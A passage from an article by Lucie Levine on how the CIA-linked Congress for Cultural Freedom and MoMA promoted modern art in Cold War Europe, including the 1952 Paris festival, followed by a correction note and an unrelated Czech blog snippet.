The CCF worked with MoMA to mount 1952’s “Masterpieces of the Twentieth Century” Festival in Paris. The works for the show came from MoMA’s Collection, and “established the CCF as a major presence in European cultural life,” as the historian Hugh Wilford wrote in his book The Mighty Wurlitzer: How the CIA Played America.

Curator James Johnson Sweeney made sure to note that the works included in the show “could not have been created . . . by such totalitarian regimes as Nazi Germany or present-day Soviet Russia.” Distilling this message even further in 1954, MoMA’s August Heckscher declared that the museum’s work was “related to the central struggle of the age—the struggle of freedom against tyranny.”

Editors’ Note: An earlier version of this article misquoted President Truman. He considered Modern art “merely the vaporings of half-baked lazy people,” not “the vaporizings.” 









Lucie Levine

Zkoušky z lásky

Připadá mi to absolutně nemožné, ale buď se mi rozbilo vyhledávání, nebo jsem skutečně ještě nikdy nevyzval ke zrušení Vánoc. Tudíž je dost ...